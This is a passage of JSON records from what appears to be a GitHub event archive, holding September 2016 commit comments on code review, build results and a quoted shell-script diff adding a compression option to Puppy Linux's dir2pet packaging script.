{"id":"4548813702","type":"CommitCommentEvent","actor":{"login":"lorenzhs"},"repo":{"name":"thrill/thrill"},"payload":{"comment":{"id":18983489,"position":14,"line":94,"path":"examples/select/select.hpp","commit_id":"0819c915f3c9a79b99655ce47802c8f3c949ec41","created_at":"2016-09-12T11:48:36Z","updated_at":"2016-09-12T11:48:36Z","body":"Wouldn't it be better to do it the other way around, explicitly specifying when something can safely be discarded? Or do you think that would result in people writing inefficient code and blaming Thrill?"}},"created_at":"2016-09-12T11:48:36Z"}
{"id":"4548814848","type":"CommitCommentEvent","actor":{"login":"nechry"},"repo":{"name":"OpenZWave/open-zwave"},"payload":{"comment":{"id":18983492,"position":null,"line":null,"path":null,"commit_id":"5df1d5292531197120c7602326e25c11d6993432","created_at":"2016-09-12T11:48:54Z","updated_at":"2016-09-12T11:48:54Z","body":"see: https://groups.google.com/forum/#!topic/openzwave/3rmb5a-IDWM\r\nthe CC Central Scene will be implemented after the V1.6 "}},"created_at":"2016-09-12T11:48:54Z"}
{"id":"4548815885","type":"CommitCommentEvent","actor":{"login":"troySteveHUNT"},"repo":{"name":"github/gitignore"},"payload":{"comment":{"id":18983497,"position":null,"line":null,"path":null,"commit_id":"4ac02fc2828adfc2e4e9327a09860e765b697057","created_at":"2016-09-12T11:49:11Z","updated_at":"2016-09-12T11:49:11Z","body":"![1999908163](https://cloud.githubusercontent.com/assets/22071281/18434808/0e09a2ce-78f8-11e6-8521-a702997dfc2f.jpg)\r\n"}},"created_at":"2016-09-12T11:49:11Z"}
{"id":"4548817435","type":"CommitCommentEvent","actor":{"login":"Fjodor42"},"repo":{"name":"abperiasamy/rtl8812AU_8821AU_linux"},"payload":{"comment":{"id":18983501,"position":null,"line":null,"path":null,"commit_id":"09a1e212b643c2ad01824fda27ce613489ba2de4","created_at":"2016-09-12T11:49:36Z","updated_at":"2016-09-12T11:49:36Z","body":"Will do - it would seem also, that other things prevent building on 4.8-rcs higher than, at least 3, so I'll take a look at the current situation and present a PR with proper checks for whether we are actually on 4.8-rc or higher"}},"created_at":"2016-09-12T11:49:36Z"}
{"id":"4548817552","type":"CommitCommentEvent","actor":{"login":"vitthalhajare"},"repo":{"name":"vitthalhajare/vgit"},"payload":{"comment":{"id":18983502,"position":null,"line":null,"path":null,"commit_id":"022aeca57c3567b25892a3fa0db231ac2fb037c0","created_at":"2016-09-12T11:49:38Z","updated_at":"2016-09-12T11:49:38Z","body":"text file"}},"created_at":"2016-09-12T11:49:38Z"}
{"id":"4548821404","type":"CommitCommentEvent","actor":{"login":"akorshun"},"repo":{"name":"multirom-aries/android_device_xiaomi_aries"},"payload":{"comment":{"id":18983516,"position":null,"line":null,"path":null,"commit_id":"6ece8e7c198afe8df5fe402eff35e98109a94677","created_at":"2016-09-12T11:50:37Z","updated_at":"2016-09-12T11:50:37Z","body":"#try to delete this line to fix bootloop\r\n    export LD_PRELOAD \"/system/lib/libshim_boringssl.so"}},"created_at":"2016-09-12T11:50:37Z"}
{"id":"4548823389","type":"CommitCommentEvent","actor":{"login":"bingmann"},"repo":{"name":"thrill/thrill"},"payload":{"comment":{"id":18983519,"position":14,"line":94,"path":"examples/select/select.hpp","commit_id":"0819c915f3c9a79b99655ce47802c8f3c949ec41","created_at":"2016-09-12T11:51:10Z","updated_at":"2016-09-12T11:51:10Z","body":"This mode is also available: set enable_consume(false) and add explicit .Dispose()."}},"created_at":"2016-09-12T11:51:10Z"}
{"id":"4548825995","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18983525,"position":11,"line":11,"path":"index.js","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T11:51:46Z","updated_at":"2016-09-12T11:51:46Z","body":"What exactly is the difference between Mercator and UTM? Because UTM is used by Google Maps."}},"created_at":"2016-09-12T11:51:46Z"}
{"id":"4548831163","type":"CommitCommentEvent","actor":{"login":"rkanavath"},"repo":{"name":"orfeotoolbox/OTB"},"payload":{"comment":{"id":18983539,"position":16,"line":120,"path":"Modules/ThirdParty/OssimPlugins/src/ossim/ossimSentinel1Model.cpp","commit_id":"5dec0466cabc4bcb2abeb790a4685db2daeaf9ff","created_at":"2016-09-12T11:53:07Z","updated_at":"2016-09-12T11:53:07Z","body":"okay. that is another RFC. so until then I keep extra space?\r\n\r\nif there is anything else to fix in code. If not you can mention that in the reply to RFC mail. so that I can request for merge after tomorrow's dashboard"}},"created_at":"2016-09-12T11:53:07Z"}
{"id":"4548833953","type":"CommitCommentEvent","actor":{"login":"Legoman99573"},"repo":{"name":"McLive/AvatarQuery"},"payload":{"comment":{"id":18983542,"position":null,"line":null,"path":null,"commit_id":"7ac08b90cd7a359e2141b0f149e8e82593c9fd76","created_at":"2016-09-12T11:53:47Z","updated_at":"2016-09-12T11:53:47Z","body":"Will compare with your version."}},"created_at":"2016-09-12T11:53:47Z"}
{"id":"4548836037","type":"CommitCommentEvent","actor":{"login":"Ribeiro652000"},"repo":{"name":"Ribeiro652000/Projet-o-Fedora-BT"},"payload":{"comment":{"id":18983550,"position":null,"line":null,"path":null,"commit_id":"55df01f33c2fa35fcdc27cf792d733c9e6fcf408","created_at":"2016-09-12T11:54:18Z","updated_at":"2016-09-12T11:54:18Z","body":"Fazendo inserts e formulário de pagamento"}},"created_at":"2016-09-12T11:54:18Z"}
{"id":"4548839203","type":"CommitCommentEvent","actor":{"login":"sudoes"},"repo":{"name":"sudoes/Java"},"payload":{"comment":{"id":18983557,"position":235,"line":235,"path":"Project/BudgetManagerV3/src/core/views/MainView.java","commit_id":"3a301fc12048dcb28dfb451cfbaa856393a54510","created_at":"2016-09-12T11:55:06Z","updated_at":"2016-09-12T11:55:06Z","body":"Optimisation: \r\n```java\r\nbudgets[0] = Double.valueOf(carBudgetField.getValue());\r\n~\r\n```\r\n\r\n__Reasons:__ carBudgetField are returning an `Object` that are casted into unused `String`\r\n\r\n__Old Method:__ Object -> String -> Double\r\n__New Method:__ Object -> Double"}},"created_at":"2016-09-12T11:55:06Z"}
{"id":"4548839580","type":"CommitCommentEvent","actor":{"login":"amitbhoraniya"},"repo":{"name":"cbeust/testng"},"payload":{"comment":{"id":18983560,"position":null,"line":null,"path":null,"commit_id":"d1490f6989c77952b3b5056b5e03d0a883cdb2b7","created_at":"2016-09-12T11:55:12Z","updated_at":"2016-09-12T11:55:12Z","body":"If testmethod is failed, then why we need to change its status to skip?"}},"created_at":"2016-09-12T11:55:12Z"}
{"id":"4548839640","type":"CommitCommentEvent","actor":{"login":"davidbgk"},"repo":{"name":"opendatateam/udata-id"},"payload":{"comment":{"id":18983561,"position":24,"line":24,"path":"udata_id/backends.py","commit_id":"cce5c782b3d1f42f0cdeffb07ce90daa3e787a59","created_at":"2016-09-12T11:55:13Z","updated_at":"2016-09-12T11:55:13Z","body":"Avoid hardcoding?"}},"created_at":"2016-09-12T11:55:13Z"}
{"id":"4548840139","type":"CommitCommentEvent","actor":{"login":"tangsilian"},"repo":{"name":"tangsilian/securitystudy"},"payload":{"comment":{"id":18983565,"position":null,"line":null,"path":null,"commit_id":"44c4a5e54ffe26dfba6edcadd402eb6bd359aca3","created_at":"2016-09-12T11:55:19Z","updated_at":"2016-09-12T11:55:19Z","body":"#同名service会优先使用优先级高的service"}},"created_at":"2016-09-12T11:55:19Z"}
{"id":"4548843618","type":"CommitCommentEvent","actor":{"login":"SanderSalamander"},"repo":{"name":"SanderSalamander/salamander-conky-config"},"payload":{"comment":{"id":18983573,"position":null,"line":null,"path":null,"commit_id":"8e94fafcdaa810503c7848ed396aa5bd71f1600f","created_at":"2016-09-12T11:56:12Z","updated_at":"2016-09-12T11:56:12Z","body":"woooooow\r\n"}},"created_at":"2016-09-12T11:56:12Z"}
{"id":"4548844460","type":"CommitCommentEvent","actor":{"login":"lipp"},"repo":{"name":"HBM/react-components"},"payload":{"comment":{"id":18983574,"position":null,"line":null,"path":null,"commit_id":"9e45ba61fc1a7d8209f836101553dcc9ca5f1d27","created_at":"2016-09-12T11:56:24Z","updated_at":"2016-09-12T11:56:24Z","body":"@zemirco I this working for forms on safari?"}},"created_at":"2016-09-12T11:56:24Z"}
{"id":"4548845092","type":"CommitCommentEvent","actor":{"login":"cmg-dev"},"repo":{"name":"BjoernBueltmann/dotfiles"},"payload":{"comment":{"id":18983575,"position":19,"line":43,"path":"install/brew.sh","commit_id":"0a15d78e2a364036879c76577408dc7c6794a712","created_at":"2016-09-12T11:56:35Z","updated_at":"2016-09-12T11:56:35Z","body":"remove"}},"created_at":"2016-09-12T11:56:35Z"}
{"id":"4548845377","type":"CommitCommentEvent","actor":{"login":"milliams"},"repo":{"name":"ganga-devs/ganga"},"payload":{"comment":{"id":18983577,"position":7,"line":77,"path":"python/Ganga/test/GPI/FileTests/TestLocalFileClient.py","commit_id":"2e77169c8445bc4120467693638a8d079002c78d","created_at":"2016-09-12T11:56:39Z","updated_at":"2016-09-12T11:56:39Z","body":"This is a strange comment. Either they are the same or they aren't (hint: they are). Who is the audience for this comment?"}},"created_at":"2016-09-12T11:56:39Z"}
{"id":"4548847080","type":"CommitCommentEvent","actor":{"login":"cmg-dev"},"repo":{"name":"BjoernBueltmann/dotfiles"},"payload":{"comment":{"id":18983578,"position":20,"line":44,"path":"install/brew.sh","commit_id":"0a15d78e2a364036879c76577408dc7c6794a712","created_at":"2016-09-12T11:57:06Z","updated_at":"2016-09-12T11:57:06Z","body":"group with chrome or other browser"}},"created_at":"2016-09-12T11:57:06Z"}
{"id":"4548848080","type":"CommitCommentEvent","actor":{"login":"cmg-dev"},"repo":{"name":"BjoernBueltmann/dotfiles"},"payload":{"comment":{"id":18983581,"position":29,"line":53,"path":"install/brew.sh","commit_id":"0a15d78e2a364036879c76577408dc7c6794a712","created_at":"2016-09-12T11:57:21Z","updated_at":"2016-09-12T11:57:21Z","body":"move to productivity. "}},"created_at":"2016-09-12T11:57:21Z"}
{"id":"4548848920","type":"CommitCommentEvent","actor":{"login":"cmg-dev"},"repo":{"name":"BjoernBueltmann/dotfiles"},"payload":{"comment":{"id":18983582,"position":27,"line":51,"path":"install/brew.sh","commit_id":"0a15d78e2a364036879c76577408dc7c6794a712","created_at":"2016-09-12T11:57:33Z","updated_at":"2016-09-12T11:57:33Z","body":"remove, is already done. "}},"created_at":"2016-09-12T11:57:33Z"}
{"id":"4548851665","type":"CommitCommentEvent","actor":{"login":"wegazi"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":18983586,"position":null,"line":null,"path":null,"commit_id":"8c9cbfe5c53b2ede38ccb73d81ecbed2bd30fb46","created_at":"2016-09-12T11:58:12Z","updated_at":"2016-09-12T11:58:12Z","body":"What do you want to do? What that you cant do \nOn 11 Sep 2016 10:46 p.m., Farhan Rahman Arnob <notifications@github.com> wrote:visual polish not working at all.\r\n\r\n—You are receiving this because you are subscribed to this thread.Reply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2016-09-12T11:58:12Z"}
{"id":"4548851679","type":"CommitCommentEvent","actor":{"login":"cmg-dev"},"repo":{"name":"BjoernBueltmann/dotfiles"},"payload":{"comment":{"id":18983587,"position":25,"line":49,"path":"install/brew.sh","commit_id":"0a15d78e2a364036879c76577408dc7c6794a712","created_at":"2016-09-12T11:58:12Z","updated_at":"2016-09-12T11:58:12Z","body":"check if necessary."}},"created_at":"2016-09-12T11:58:12Z"}
{"id":"4548851901","type":"CommitCommentEvent","actor":{"login":"Arcesilas"},"repo":{"name":"JosephSilber/bouncer"},"payload":{"comment":{"id":18983588,"position":null,"line":null,"path":null,"commit_id":"492982c40c6e7df88dc084872c3a99ee3acfcfe4","created_at":"2016-09-12T11:58:14Z","updated_at":"2016-09-12T11:58:14Z","body":"#126 "}},"created_at":"2016-09-12T11:58:14Z"}
{"id":"4548852803","type":"CommitCommentEvent","actor":{"login":"hvelarde"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18983591,"position":null,"line":null,"path":null,"commit_id":"dcd8adbf343727cd5a8c5576962b37709c3ccfb9","created_at":"2016-09-12T11:58:26Z","updated_at":"2016-09-12T11:58:26Z","body":"don't worry, I'll fix it... thanks a lot!"}},"created_at":"2016-09-12T11:58:26Z"}
{"id":"4548853514","type":"CommitCommentEvent","actor":{"login":"cmg-dev"},"repo":{"name":"BjoernBueltmann/dotfiles"},"payload":{"comment":{"id":18983592,"position":23,"line":47,"path":"install/brew.sh","commit_id":"0a15d78e2a364036879c76577408dc7c6794a712","created_at":"2016-09-12T11:58:36Z","updated_at":"2016-09-12T11:58:36Z","body":"Group with other virtual tools."}},"created_at":"2016-09-12T11:58:36Z"}
{"id":"4548855060","type":"CommitCommentEvent","actor":{"login":"cmg-dev"},"repo":{"name":"BjoernBueltmann/dotfiles"},"payload":{"comment":{"id":18983593,"position":28,"line":52,"path":"install/brew.sh","commit_id":"0a15d78e2a364036879c76577408dc7c6794a712","created_at":"2016-09-12T11:58:59Z","updated_at":"2016-09-12T11:58:59Z","body":"move to productivity. Is already done."}},"created_at":"2016-09-12T11:58:59Z"}
{"id":"4548855269","type":"CommitCommentEvent","actor":{"login":"koying"},"repo":{"name":"koying/SPMC"},"payload":{"comment":{"id":18983594,"position":null,"line":null,"path":null,"commit_id":"115edb86cd517d24e1ef0beb2551fd94860d7578","created_at":"2016-09-12T11:59:03Z","updated_at":"2016-09-12T11:59:03Z","body":"Let's see what nv comes up with.\r\nThey promised me beta of their N, so we might do damage control and tell them to properly implement IEC61937 HD ;)"}},"created_at":"2016-09-12T11:59:03Z"}
{"id":"4548855815","type":"CommitCommentEvent","actor":{"login":"zemirco"},"repo":{"name":"HBM/react-components"},"payload":{"comment":{"id":18983595,"position":null,"line":null,"path":null,"commit_id":"9e45ba61fc1a7d8209f836101553dcc9ca5f1d27","created_at":"2016-09-12T11:59:11Z","updated_at":"2016-09-12T11:59:11Z","body":"not tested but the fix was not acceptable. was merged too early. for example cursor hover style was lost (pointer)."}},"created_at":"2016-09-12T11:59:11Z"}
{"id":"4548859555","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18983602,"position":null,"line":null,"path":null,"commit_id":"cec32071034de73cdd2562852f32f6f0ab9bd846","created_at":"2016-09-12T12:00:03Z","updated_at":"2016-09-12T12:00:03Z","body":"IMO, now we need to avoid hardcode stuff like that, and throw everything in renderer configuration when possible.\r\nI hope that you will agree on that ?"}},"created_at":"2016-09-12T12:00:03Z"}
{"id":"4548861034","type":"CommitCommentEvent","actor":{"login":"cmg-dev"},"repo":{"name":"BjoernBueltmann/dotfiles"},"payload":{"comment":{"id":18983605,"position":32,"line":56,"path":"install/brew.sh","commit_id":"0a15d78e2a364036879c76577408dc7c6794a712","created_at":"2016-09-12T12:00:23Z","updated_at":"2016-09-12T12:00:23Z","body":"Please add Kraken, if possible."}},"created_at":"2016-09-12T12:00:23Z"}
{"id":"4548863411","type":"CommitCommentEvent","actor":{"login":"cmg-dev"},"repo":{"name":"BjoernBueltmann/dotfiles"},"payload":{"comment":{"id":18983612,"position":33,"line":57,"path":"install/brew.sh","commit_id":"0a15d78e2a364036879c76577408dc7c6794a712","created_at":"2016-09-12T12:00:53Z","updated_at":"2016-09-12T12:00:53Z","body":"Please leave this out. "}},"created_at":"2016-09-12T12:00:53Z"}
{"id":"4548863476","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18983613,"position":null,"line":null,"path":null,"commit_id":"e1f40e7f1fd91a88289efa6fc345df39d125d917","created_at":"2016-09-12T12:00:54Z","updated_at":"2016-09-12T12:00:54Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 242](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1198&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:28:58"}},"created_at":"2016-09-12T12:00:54Z"}
{"id":"4548863505","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18983614,"position":null,"line":null,"path":null,"commit_id":"f09125c55b3d81867be37d37cb473319bb8f6041","created_at":"2016-09-12T12:00:55Z","updated_at":"2016-09-12T12:00:55Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 243](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1199&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T12:00:55Z"}
{"id":"4548868286","type":"CommitCommentEvent","actor":{"login":"jacobsa"},"repo":{"name":"GoogleCloudPlatform/gcsfuse"},"payload":{"comment":{"id":18983624,"position":40,"line":40,"path":"vendor/github.com/jacobsa/fuse/mount.go","commit_id":"e2cd3dcff5c2741e7cb89e1324e5d5e7f890d75b","created_at":"2016-09-12T12:02:04Z","updated_at":"2016-09-12T12:02:04Z","body":"This is probably causing #189."}},"created_at":"2016-09-12T12:02:04Z"}
{"id":"4548869579","type":"CommitCommentEvent","actor":{"login":"Febregaz"},"repo":{"name":"Febregaz/-"},"payload":{"comment":{"id":18983628,"position":null,"line":null,"path":null,"commit_id":"1205bc9c5b8a658b76ec4b93670ea28c04cfa8eb","created_at":"2016-09-12T12:02:24Z","updated_at":"2016-09-12T12:02:24Z","body":"The sort"}},"created_at":"2016-09-12T12:02:24Z"}
{"id":"4548870239","type":"CommitCommentEvent","actor":{"login":"cmg-dev"},"repo":{"name":"BjoernBueltmann/dotfiles"},"payload":{"comment":{"id":18983630,"position":12,"line":36,"path":"install/brew.sh","commit_id":"0a15d78e2a364036879c76577408dc7c6794a712","created_at":"2016-09-12T12:02:34Z","updated_at":"2016-09-12T12:02:34Z","body":"just do a cleanup. ```brew update``` is not necessary, because we just installed brew."}},"created_at":"2016-09-12T12:02:34Z"}
{"id":"4548872499","type":"CommitCommentEvent","actor":{"login":"rserwin1"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18983636,"position":124,"line":176,"path":"woof-code/rootfs-skeleton/usr/bin/dir2pet","commit_id":"cd80fb134b90b0b3833f160cb34cf2b211a94d24","created_at":"2016-09-12T12:03:08Z","updated_at":"2016-09-12T12:03:08Z","body":"Mick,\nThat seems to be a good solution.  Thanks for working it up. Since \n\"set-comp\" is an \"option\", shouldn't it be preceded by \"--\", to be \n\"--set-comp\"?  Or maybe \"-c gz|xz, --compression-default=gz|xz\".\n\nBTW, I have just posted some packages (in Additional Software - Systems) \nthat add support for xz pets in lucid, wary and precise, as well as for \nthe  \"dogs\".  That should make it more acceptable to use xz generally, \ndepending on whether they cover enough of the puppies in use in the world.\nR\n\n\nMick Amadio wrote:\n>\n> Hi Richard,\n>\n> Ok, I have left default at gzip but have added a new option with help \n> (in the Basic section).\n>\n> I'll post a diff and the full script for perusal. I think this is a \n> good outcome.\n>\n> The diff:\n>\n> --- /initrd/pup_ro2/usr/bin/dir2pet 2016-09-04 13:55:21.000000000 +1000\n> +++ /usr/bin/dir2pet 2016-09-10 08:06:57.964770477 +1000\n> @@ -20,6 +20,32 @@\n>   #160524 rerwin: correct search for top category in hierarchy.\n>   #160803 rerwin: correct pet.specs path; sync compression default; simplify parameter parsing\n>\n> +comp=gz # default at first run\n> +[ -f \"$HOME/.dir2pet.cfg\" ] && . $HOME/.dir2pet.cfg\n> +\n> +# set default compression\n> +set_comp() {\n> + echo \"Please set your default compresion.\"\n> + echo \"Compression determines the size of the end package. 'xz' is\"\n> + echo \"smaller but is slower to decompress whereas 'gz' is the\"\n> + echo \"opposite. If you have a slow old machine we reccommend 'gz'\"\n> + echo \"however if you have a faster machine 'xz' is probably a\"\n> + echo \"better choice. If you don't know it will be safe just to press\"\n> + echo \"'Enter'.\"\n> + echo\n> + echo \"Press 'Enter' to use the current $comp compression or press\"\n> + echo \"any prinatble key character and 'Enter' to change.\"\n> +\n> + case $comp in\n> + xz)newcomp=gz;;\n> + gz)newcomp=xz;;\n> + esac\n> + read setcomp\n> + [ -z \"$setcomp\" ] && echo \"comp=$comp\" > $HOME/.dir2pet.cfg ||\\\n> + echo \"comp=$newcomp\" > $HOME/.dir2pet.cfg\n> + exit 0\n> +}\n> +\n>   usage() {\n>      echo '\n>   Usage: dir2pet [option]... [<name-of-dir>]\n> @@ -35,9 +61,13 @@\n>     <name-of-dir>    the directory, not path, to be packaged.\n>                   THIS IS THE PACKAGE.\n>                   (Omit if specified with -p option)\n> -\n> -EXAMPLE:\n> -# dir2pet my_fun_game-0.1-i486\n> +\n> + EXAMPLE:\n> + # dir2pet my_fun_game-0.1-i486\n> +\n> + set-comp Use this to set or change the default compression\n> + between \"gz\" and \"xz\".\n> + The current default is '$comp'\n>\n>   --------------------------------------------------------------------\n>\n> @@ -77,10 +107,6 @@\n>   ' #160803\n>   }\n>\n> -comp=gz #default - change only this to set new deault. #160803\n> -arch=`uname -m` #160803\n> -[ \"${arch:0:3}\" = \"arm\" ] && comp=gz #160803\n> -\n>   #parameters\n>   while [ $# -gt 0 ]; do #160803\n>      case $1 in\n> @@ -91,6 +117,7 @@\n>          -d=*) deps=`echo $1|cut -d '=' -f2`;;\n>          -c=*) category=`echo $1|cut -d '=' -f2`;;\n>          -p=*) directory=`echo $1|cut -d '=' -f2`;;\n> + set-comp) set_comp;;\n>          [a-zA-Z]*)dir=$1;; #160803\n>          -h|--help|\"\") usage; exit;;\n>          *) echo \"Invalid argument: $1\"; usage; exit;;\n> @@ -177,8 +204,10 @@\n>      echo\n>      echo \"If any of the above needs to be further sorted out, you can quit this\"\n>      echo \"script right now by pressing CTRL-C, otherwise just press ENTER\"\n> - default=xz char=\"g\" other=gzip\n> - [ \"$comp\" = \"gz\" ] && default=gzip char=\"x\" other=xz #160803\n> + case $comp in\n> + xz)default=xz char=\"g\" other=gzip;;\n> + gz)default=gzip char=\"x\" other=xz;;\n> + esac\n>      echo \"to use the default \\\"$default\\\" compression or \\\"$char\\\" then ENTER for \"\n>      echo \"\\\"$other\\\" compression.\"\n>      echo -n \"Press ENTER key or \\\"$char\\\" and ENTER to continue: \"\n>\n> The revised script\n>\n> #!/bin/sh\n> #Barry Kauler (c) Copyight 2007,2009 www.puppylinux.com\n> #2007 Lesser GPL licence v2 \n> (http://www.fsf.org/licensing/licenses/lgpl.html)\n> #This script will create a PET package.\n> #Just create a directory with the name of the package, for example \n> 'abiword-0.5.6'\n> #and put what you want in it.\n> #It should have abiword-0.5.6/usr/share/applications/abiword.desktop \n> if the\n> #application requires a menu entry, but if there isn't one this script \n> will ask\n> #some simple questions and create one.\n> #This script will also create abiword-0.5.6/pet.specs, which has\n> #some information useful to the Puppy Package Manager.\n> #w476, w478 fixes to work with petspec.\n> #w482 if preexisting pet.specs, read fields from it.\n> #100201 improve reading of pet.specs\n> #100303 fix bug detection arch-dependent pkg.\n> #130305 rerwin: ensure package tmp directory, if any, has all permissions.\n> #131122 support xz compressed pets (see installpkg.sh, pet2tgz)\n> #131123 changed default to gzip, will change it back in a year or 2\n> #141011 add command line args for unattended builds\n> #160524 rerwin: correct search for top category in hierarchy.\n> #160803 rerwin: correct pet.specs path; sync compression default; \n> simplify parameter parsing\n>\n> comp=gz# default at first run\n> [-f  \"$HOME/.dir2pet.cfg\"  ]&&  .  $HOME/.dir2pet.cfg\n>\n> # set default compression\n> set_comp() {\n>      echo  \"Please set your default compresion.\"\n>      echo  \"Compression determines the size of the end package. 'xz' is\"\n>      echo  \"smaller but is slower to decompress whereas 'gz' is the\"\n>      echo  \"opposite. If you have a slow old machine we reccommend 'gz'\"\n>      echo  \"however if you have a faster machine 'xz' is probably a\"\n>      echo  \"better choice. If you don't know it will be safe just to press\"\n>      echo  \"'Enter'.\"\n>      echo\n>      echo  \"Press 'Enter' to use the current $comp compression or press\"\n>      echo  \"any prinatble key character and 'Enter' to change.\"\n>\n>      case  $comp  in\n>          xz)newcomp=gz;;\n>          gz)newcomp=xz;;\n>      esac\n>      read setcomp\n>      [ -z\"$setcomp\"  ] && echo\"comp=$comp\"  >$HOME/.dir2pet.cfg ||\\\n>      echo\"comp=$newcomp\"  >$HOME/.dir2pet.cfg\n>      exit 0\n> }\n>\n> usage() {\n>      echo  '\n> Usage: dir2pet [option]... [<name-of-dir>]\n>\n> Create a compressed file containing the content of a directory\n>\n> Options:\n> -h|--help show this help\n>\n> --------------------------------------------------------------------\n>\n> Basic:\n> <name-of-dir> the directory, not path, to be packaged.\n> THIS IS THE PACKAGE.\n> (Omit if specified with -p option)\n>\n> EXAMPLE:\n> # dir2pet my_fun_game-0.1-i486\n>\n> set-comp Use this to set or change the default compression\n> between \"gz\" and \"xz\".\n> The current default is '$comp'\n>\n> --------------------------------------------------------------------\n>\n> Advanced:\n> -s skip all questions - useful for package build scripts\n> -p=<name-of-dir> directory to be packaged. THIS IS THE PACKAGE.\n>\n> THE following options are only useful with the \"-s\" option.\n> For best results, use as many as possible:\n> '  #160803\n>      echo  \"Compression: (only use one, default if none chosen is \\\"$comp\\\")\"  #160803\n>      echo  ' -x use xz (high) compression\n> -g use gz (low) compression\n>\n> Non-compulsory:\n> -w=\"<description>\" quoted description of the application\"\n> -d=<+deps> comma-delimited dependencies, with prepended \"+\" sign\n> -c=<Category> category of application; for package manager\n>\n> LIST of allowed Categories: (default: BuildingBlock)\n> Desktop\n> System\n> Setup\n> Utility\n> Filesystem\n> Graphic\n> Document\n> Business\n> Personal\n> Network\n> Internet\n> Multimedia\n> Fun\n>\n> EXAMPLE\n> # dir2pet -x -s -w=\"fun game\" -d=+gtk+,+ffmpeg,+cairo \n> -p=my_fun_game-0.1-i486\n> '  #160803\n> }\n>\n> #parameters\n> while  [$#  -gt  0 ];  do  #160803\n>      case  $1  in\n>          -x) comp=xz ;;\n>          -g) comp=gz ;;\n>          -s) skip=1 ;;\n>          -w=*) desc=\"`echo \"$1\"|cut -d '=' -f2`\"  ;;\n>          -d=*) deps=`echo $1|cut -d '=' -f2`;;\n>          -c=*) category=`echo $1|cut -d '=' -f2`;;\n>          -p=*) directory=`echo $1|cut -d '=' -f2`;;\n>          set-comp) set_comp;;\n>          [a-zA-Z]*)dir=$1;; #160803\n>          -h|--help|\"\") usage;  exit;;\n>          *)echo  \"Invalid argument: $1\";  usage;  exit;;\n>      esac\n>      shift  #also decrements $# 160803\n> done\n>\n> ISDIR=$dir\n> [-z  \"$ISDIR\"  ]&&  dir=$directory\n>\n> if  [!  -d  \"$dir\"  ];then\n>   usage\n>   exit\n> fi\n>\n> ADIR=$dir\n> MYPID=${$}\n>\n> #split ADIR path/filename into components...\n> BASEPKG=\"`basename $ADIR`\"\n> DIRPKG=\"`dirname $ADIR`\"\n> [\"$DIRPKG\"  =  \"/\"  ]&&  DIRPKG=\"\"\n>\n> #w482 directory may already have a pet.specs, reuse it...\n> NAMEONLY=\"\"\n> PUPMENUDESCR=\"\"\n> PUPOFFICIALDEPS=\"\"\n> PUPCATEGORY=\"\"\n> PUPPATH=\"\"  #100201\n> ARCHDEPENDENT=\"yes\"  #100201\n> DEFREPO=\"\"  #100201\n> if  [-f  $DIRPKG/$BASEPKG/pet.specs ];then  #160803\n>   #new: \n> pkgname|nameonly|version|pkgrelease|category|size|path|fullfilename|dependencies|description|\n>   #optionally on the end: compileddistro|compiledrelease|repo| (fields \n> 11,12,13)\n>   PETSPECS=\"`cat $DIRPKG/$BASEPKG/pet.specs | head -n 1`\"  #160803\n>   DB_pkgname=\"`echo -n \"$PETSPECS\" | cut -f 1 -d '|'`\"\n>   DB_nameonly=\"`echo -n \"$PETSPECS\" | cut -f 2 -d '|'`\"\n>   NAMEONLY=\"$DB_nameonly\"\n>   DB_version=\"`echo -n \"$PETSPECS\" | cut -f 3 -d '|'`\"\n>   DB_pkgrelease=\"`echo -n \"$PETSPECS\" | cut -f 4 -d '|'`\"\n>   DB_category=\"`echo -n \"$PETSPECS\" | cut -f 5 -d '|'`\"\n>   PUPCATEGORY=\"$DB_category\"\n>   DB_size=\"`echo -n \"$PETSPECS\" | cut -f 6 -d '|'`\"\n>   DB_path=\"`echo -n \"$PETSPECS\" | cut -f 7 -d '|'`\"\n>   PUPPATH=\"$DB_path\"  #100201\n>   DB_fullfilename=\"`echo -n \"$PETSPECS\" | cut -f 8 -d '|'`\"\n>   DB_dependencies=\"`echo -n \"$PETSPECS\" | cut -f 9 -d '|'`\"\n>   PUPOFFICIALDEPS=\"$DB_dependencies\"\n>   DB_description=\"`echo -n \"$PETSPECS\" | cut -f 10 -d '|'`\"\n>   PUPMENUDESCR=\"$DB_description\"\n>   DB_compileddistro=\"`echo -n \"$PETSPECS\" | cut -f 11 -d '|'`\"\n>   DB_compiledrelease=\"`echo -n \"$PETSPECS\" | cut -f 12 -d '|'`\"\n>   ARCHDEPENDENT=\"${DB_compileddistro}|${DB_compiledrelease}\"\n>   DB_repo=\"`echo -n \"$PETSPECS\" | cut -f 13 -d '|'`\"\n>   DEFREPO=\"$DB_repo\"\n> fi\n>\n> #difficult task, separate package name from version part...\n> #not perfect, some start with non-numeric version info...\n> [\"$NAMEONLY\"  =  \"\"  ]&&  NAMEONLY=\"`echo -n \"$BASEPKG\" | sed -e 's/\\-[0-9].*$//g'`\"\n> #...if that fails, do it the old way...\n> [\"$NAMEONLY\"  =  \"$BASEPKG\"  ]&&  NAMEONLY=\"`echo \"$BASEPKG\" | cut -f 1 -d \"-\"`\"\n>\n> # comp\n> if  [\"$skip\"  !=  1 ];then\n> clear\n>      echo  \"Welcome to the 'dir2pet' script.\"\n>      echo  \"This will convert a directory into a PET package. Example, you have a \"\n>      echo  \"directory named 'abiword-0.5.6' and inside that you place whatever is\"\n>      echo  \"needed for the package, for example 